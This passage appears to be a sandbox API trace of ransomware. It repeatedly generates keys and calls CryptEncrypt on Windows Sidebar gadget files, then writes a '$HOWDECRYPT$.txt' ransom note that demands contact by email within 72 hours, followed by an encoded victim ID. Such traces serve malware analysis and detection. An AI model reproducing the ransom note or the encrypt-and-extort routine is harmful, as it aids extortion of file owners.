dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.843] GetProcessHeap () returned 0x2c0000 [0161.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.843] GetProcessHeap () returned 0x2c0000 [0161.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86e60 | out: hHeap=0x2c0000) returned 1 [0161.844] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce808 | out: pbBuffer=0x25ce808) returned 1 [0161.844] GetProcessHeap () returned 0x2c0000 [0161.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.844] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce800*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce800*=0x30) returned 1 [0161.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.852] GetProcessHeap () returned 0x2c0000 [0161.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.852] GetProcessHeap () returned 0x2c0000 [0161.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0cc0 | out: hHeap=0x2c0000) returned 1 [0161.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce800 | out: pbBuffer=0x25ce800) returned 1 [0161.852] GetProcessHeap () returned 0x2c0000 [0161.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7f8*=0x30) returned 1 [0161.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.854] GetProcessHeap () returned 0x2c0000 [0161.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.854] GetProcessHeap () returned 0x2c0000 [0161.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86c70 | out: hHeap=0x2c0000) returned 1 [0161.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce800 | out: pbBuffer=0x25ce800) returned 1 [0161.855] GetProcessHeap () returned 0x2c0000 [0161.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.855] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7f8*=0x30) returned 1 [0161.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.856] GetProcessHeap () returned 0x2c0000 [0161.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.857] GetProcessHeap () returned 0x2c0000 [0161.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf3b8 | out: hHeap=0x2c0000) returned 1 [0161.857] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7f8 | out: pbBuffer=0x25ce7f8) returned 1 [0161.857] GetProcessHeap () returned 0x2c0000 [0161.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.857] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7f0*=0x30) returned 1 [0161.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.859] GetProcessHeap () returned 0x2c0000 [0161.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.859] GetProcessHeap () returned 0x2c0000 [0161.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0810 | out: hHeap=0x2c0000) returned 1 [0161.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7f8 | out: pbBuffer=0x25ce7f8) returned 1 [0161.859] GetProcessHeap () returned 0x2c0000 [0161.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7f0*=0x30) returned 1 [0161.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.861] GetProcessHeap () returned 0x2c0000 [0161.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.861] GetProcessHeap () returned 0x2c0000 [0161.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86b78 | out: hHeap=0x2c0000) returned 1 [0161.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7f0 | out: pbBuffer=0x25ce7f0) returned 1 [0161.861] GetProcessHeap () returned 0x2c0000 [0161.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7e8*=0x30) returned 1 [0161.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.863] GetProcessHeap () returned 0x2c0000 [0161.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.863] GetProcessHeap () returned 0x2c0000 [0161.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf2b8 | out: hHeap=0x2c0000) returned 1 [0161.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7f0 | out: pbBuffer=0x25ce7f0) returned 1 [0161.863] GetProcessHeap () returned 0x2c0000 [0161.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7e8*=0x30) returned 1 [0161.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.865] GetProcessHeap () returned 0x2c0000 [0161.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.865] GetProcessHeap () returned 0x2c0000 [0161.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0450 | out: hHeap=0x2c0000) returned 1 [0161.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7e8 | out: pbBuffer=0x25ce7e8) returned 1 [0161.866] GetProcessHeap () returned 0x2c0000 [0161.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.866] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7e0*=0x30) returned 1 [0161.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.869] GetProcessHeap () returned 0x2c0000 [0161.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.869] GetProcessHeap () returned 0x2c0000 [0161.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86a80 | out: hHeap=0x2c0000) returned 1 [0161.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7e8 | out: pbBuffer=0x25ce7e8) returned 1 [0161.869] GetProcessHeap () returned 0x2c0000 [0161.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7e0*=0x30) returned 1 [0161.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.877] GetProcessHeap () returned 0x2c0000 [0161.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.877] GetProcessHeap () returned 0x2c0000 [0161.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86890 | out: hHeap=0x2c0000) returned 1 [0161.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7e0 | out: pbBuffer=0x25ce7e0) returned 1 [0161.877] GetProcessHeap () returned 0x2c0000 [0161.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7d8*=0x30) returned 1 [0161.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\timezones.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.897] GetProcessHeap () returned 0x2c0000 [0161.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.897] GetProcessHeap () returned 0x2c0000 [0161.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c864b0 | out: hHeap=0x2c0000) returned 1 [0161.897] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7e0 | out: pbBuffer=0x25ce7e0) returned 1 [0161.897] GetProcessHeap () returned 0x2c0000 [0161.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7d8*=0x30) returned 1 [0161.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.919] GetProcessHeap () returned 0x2c0000 [0161.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.919] GetProcessHeap () returned 0x2c0000 [0161.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2718 | out: hHeap=0x2c0000) returned 1 [0161.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7d8 | out: pbBuffer=0x25ce7d8) returned 1 [0161.919] GetProcessHeap () returned 0x2c0000 [0161.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7d0*=0x30) returned 1 [0161.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.969] GetProcessHeap () returned 0x2c0000 [0161.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.969] GetProcessHeap () returned 0x2c0000 [0161.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaecb8 | out: hHeap=0x2c0000) returned 1 [0161.969] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7d8 | out: pbBuffer=0x25ce7d8) returned 1 [0161.969] GetProcessHeap () returned 0x2c0000 [0161.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.969] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7d0*=0x30) returned 1 [0161.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.027] GetProcessHeap () returned 0x2c0000 [0162.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.027] GetProcessHeap () returned 0x2c0000 [0162.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb66a8 | out: hHeap=0x2c0000) returned 1 [0162.027] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7d0 | out: pbBuffer=0x25ce7d0) returned 1 [0162.027] GetProcessHeap () returned 0x2c0000 [0162.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.027] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7c8*=0x30) returned 1 [0162.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.060] GetProcessHeap () returned 0x2c0000 [0162.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.060] GetProcessHeap () returned 0x2c0000 [0162.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6478 | out: hHeap=0x2c0000) returned 1 [0162.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7d0 | out: pbBuffer=0x25ce7d0) returned 1 [0162.060] GetProcessHeap () returned 0x2c0000 [0162.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7c8*=0x30) returned 1 [0162.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.062] GetProcessHeap () returned 0x2c0000 [0162.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.063] GetProcessHeap () returned 0x2c0000 [0162.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfa00 | out: hHeap=0x2c0000) returned 1 [0162.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7c8 | out: pbBuffer=0x25ce7c8) returned 1 [0162.063] GetProcessHeap () returned 0x2c0000 [0162.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7c0*=0x30) returned 1 [0162.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.065] GetProcessHeap () returned 0x2c0000 [0162.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.065] GetProcessHeap () returned 0x2c0000 [0162.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaebb8 | out: hHeap=0x2c0000) returned 1 [0162.065] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7c8 | out: pbBuffer=0x25ce7c8) returned 1 [0162.065] GetProcessHeap () returned 0x2c0000 [0162.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.065] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7c0*=0x30) returned 1 [0162.066] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.068] GetProcessHeap () returned 0x2c0000 [0162.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.068] GetProcessHeap () returned 0x2c0000 [0162.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf910 | out: hHeap=0x2c0000) returned 1 [0162.068] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7c0 | out: pbBuffer=0x25ce7c0) returned 1 [0162.068] GetProcessHeap () returned 0x2c0000 [0162.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.068] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7b8*=0x30) returned 1 [0162.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.070] GetProcessHeap () returned 0x2c0000 [0162.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.070] GetProcessHeap () returned 0x2c0000 [0162.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae9b8 | out: hHeap=0x2c0000) returned 1 [0162.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce7c0 | out: pbBuffer=0x25ce7c0) returned 1 [0162.070] GetProcessHeap () returned 0x2c0000 [0162.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.071] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce7b8*=0x30) returned 1 [0162.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.075] GetProcessHeap () returned 0x2c0000 [0162.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.075] GetProcessHeap () returned 0x2c0000 [0162.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb900 | out: hHeap=0x2c0000) returned 1 [0162.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.237] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.237] WriteFile (in: hFile=0x178, lpBuffer=0x25ce6ef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce818, lpOverlapped=0x0 | out: lpBuffer=0x25ce6ef*, lpNumberOfBytesWritten=0x25ce818*=0x127, lpOverlapped=0x0) returned 1 [0162.238] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.238] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce818, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, 